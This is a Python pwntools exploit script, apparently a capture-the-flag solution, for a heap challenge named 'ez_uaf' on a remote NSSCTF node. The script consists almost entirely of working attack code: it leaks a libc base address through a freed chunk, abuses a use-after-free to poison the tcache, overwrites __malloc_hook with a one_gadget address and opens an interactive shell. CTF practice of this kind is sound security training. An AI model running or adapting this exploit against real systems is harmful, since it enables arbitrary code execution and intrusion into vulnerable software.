1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
| from pwn import *
io = remote("node5.anna.nssctf.cn", 25103)
elf = ELF("./ez_uaf")
libc = ELF("./libc-2.27.so")
context(os='linux', arch='amd64')
def debug():
gdb.attach(io)
def malloc(size, name, message):
io.sendafter(b'Choice: \n', b'1')
io.sendafter(b'Size:', str(size).encode())
io.sendafter(b'Name: ', name)
io.sendafter(b'Content:', message)
def free(idx):
io.sendafter(b'Choice: \n', b'2')
io.sendafter(b'Input your idx:', str(idx).encode())
def show(idx):
io.sendafter(b'Choice: \n', b'3')
io.sendafter(b'Input your idx:', str(idx).encode())
def edit(idx, message):
io.sendafter(b'Choice: \n', b'4')
io.sendafter(b'Input your idx:', str(idx).encode())
io.send(message)
malloc(0x410, b'a', b'a')
malloc(0x20, b'a', b'a')
free(0)
show(0)
libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x70 - libc.sym["__malloc_hook"]
print(f'libc:{hex(libc_base)}')
one_gadget = libc_base + 0x10a2fc
free(1)
edit(1, p64(libc_base + libc.sym["__malloc_hook"]))
malloc(0x20, b'a', b'a')
malloc(0x20, p64(one_gadget), b'a')
io.sendafter(b'Choice: \n', b'1')
io.sendafter(b'Size:', b'16')
io.interactive()
|